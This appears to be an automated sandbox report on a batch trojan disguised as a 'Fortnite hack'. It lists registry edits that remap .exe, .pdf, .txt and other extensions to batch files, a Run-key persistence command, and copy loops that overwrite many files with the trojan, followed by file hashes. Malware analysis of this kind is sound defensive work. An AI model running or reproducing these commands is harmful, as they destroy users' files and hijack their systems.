description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4 cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.doc cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\ = "batfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "batfile" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "batfile" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.txt cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3 cmd.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1320 wrote to memory of 4412 1320 cmd.exe 82 PID 1320 wrote to memory of 4412 1320 cmd.exe 82 PID 1320 wrote to memory of 4876 1320 cmd.exe 84 PID 1320 wrote to memory of 4876 1320 cmd.exe 84 PID 1320 wrote to memory of 4852 1320 cmd.exe 85 PID 1320 wrote to memory of 4852 1320 cmd.exe 85 PID 1320 wrote to memory of 2436 1320 cmd.exe 87 PID 1320 wrote to memory of 2436 1320 cmd.exe 87 PID 1320 wrote to memory of 2044 1320 cmd.exe 88 PID 1320 wrote to memory of 2044 1320 cmd.exe 88 PID 1320 wrote to memory of 1644 1320 cmd.exe 89 PID 1320 wrote to memory of 1644 1320 cmd.exe 89 PID 1320 wrote to memory of 1572 1320 cmd.exe 90 PID 1320 wrote to memory of 1572 1320 cmd.exe 90 PID 1320 wrote to memory of 4800 1320 cmd.exe 91 PID 1320 wrote to memory of 4800 1320 cmd.exe 91 PID 1320 wrote to memory of 1120 1320 cmd.exe 92 PID 1320 wrote to memory of 1120 1320 cmd.exe 92 PID 1320 wrote to memory of 5056 1320 cmd.exe 94 PID 1320 wrote to memory of 5056 1320 cmd.exe 94 PID 1320 wrote to memory of 4264 1320 cmd.exe 95 PID 1320 wrote to memory of 4264 1320 cmd.exe 95 PID 1320 wrote to memory of 2136 1320 cmd.exe 96 PID 1320 wrote to memory of 2136 1320 cmd.exe 96 PID 1320 wrote to memory of 5072 1320 cmd.exe 97 PID 1320 wrote to memory of 5072 1320 cmd.exe 97
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_12735_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f2⤵
- Adds Run key to start application
PID:4412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:4876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵PID:4852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:2436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:2044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:1644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵
- Drops file in Program Files directory
PID:1572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:4800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:1120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:5056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵PID:4264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:2136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:5072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:4300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵PID:4648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:2308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""2⤵PID:5108
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5548e0aca55c4cae0e2df2d0d5ac18f34
SHA1311e507a79c8174007d26837ff55b25722eae0ca
SHA2563ed54618f793a9f7f9c033d5d3e5d3c68ded55df8710428dd7a40872db6e0f9a
SHA5125355d65bfbb5587dcda21d026c948229cee95dddc78b0e825106dcedc4f13e008cfbbf49266a09d8847189ee569a266f5827be0e8ed88bab7f91c9a3f12250ca
-
Filesize
428KB
MD542157d62377b0bfcfa95bca5b12136b5
SHA102d5874d9843b89c16b80bfc0c2cbd26d875b481
SHA256f7784c781833f51b94600e11732943a31d368ac259360e72e3b944cb35b38388
SHA512ae9974836072dd043ad8a8f75be51f72a4e0be7326ef5a6b547b8e5823113303560587a3f7bfe20a0c3b8c7c6c70c2ef2328ea9984eb073bea456d242e0ff645
-
Filesize
37KB
MD5fef2df506ee1214eb1b613b8fc536439
SHA13985c77b58a678c6d3c96f002cd9579b1732257b
SHA25688c9e05be13767bb5c67ea29e8b241197e8d9e8ac229596cc0c9f277bf840eb0
SHA5129dcacbde5518b80e18aa3a097ccce021bd94c87c0f8f8bd59e8b96a72845520b70ce0e851cf2e05ac73abbc9d6b37564bd12bde5d93e754d452a803ae0e29ef4
-
Filesize
1KB
MD559ea1c8fcc19ef7b68f5b815b5ab66ce
SHA18667b22c499703e9950984a694ed0c4fbda21c05
SHA25636dcdf53d889cba601ba0f255ceb21a755780cdbe7c70383f5491e5f4481b87e
SHA512080e22fe69858d2128e226436d3c8cd99911cbf7978fb898249505f8690491b6b29ab44c33f0bdf1b9e8f70f56abb60f0659b2b00e50d5fe5f9a2644c1546c98
-
Filesize
2KB
MD5d5e1a37b60ca49583586dfdb3344b6b0
SHA100a606d0b5d0b0b59e9817fdd6149cc46f2b8e8f
SHA25690ea0016d98e3494b20f255aad714504afc9663329342d47782750ce88089c93
SHA512b76ed027e64adba03e1740dad648c33bdcd11cefe517318567b8f345ed37f9b5673cd5af16538212888929bf954a39e39e5b609a41a047e334179d01633e8840
-
Filesize
2.1MB
MD550fdd0dc567d10123b19045481eb7bfb
SHA149a97d143326c7481fdeb68f934e373729b8a47a
SHA2564c2c979e92513d0092de287005c83af46f5335be603175192a8bd878f482c2fb
SHA5128765bd61eafe4e5223edf2dd1f5123927cdb2f6f8c9cd31fb20dd6fb37a5b7f594c3282b94cfbab774f40eae9b53e0c982e3c6e4ec52f4a51e1a1df53eb4615b
-
Filesize
35KB
MD5f4b7738f0b43402682d34e0fa25c3094
SHA17574bd63175ef0fee8f3c384a1b5b63bdbb42fbc
SHA256780e0730d95ec043a8df4259d29cdb67295904863ed3e9d51e4333c48a4f063b
SHA51270fd2bda5cc440d8126206b5c32eb34d730ba74f0217b5d3ab4b00caf716f0b15e9f24676ce317ae2946248598fe4fa1c0667f2214adacf51a0b356f544cb39c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx
Filesize34KB
MD5ac04b6f6fa293c4b55c4c8b49372a9ec
SHA19dfca519218c3c10203163454f1237916b0655cc
SHA256273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
SHA512b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086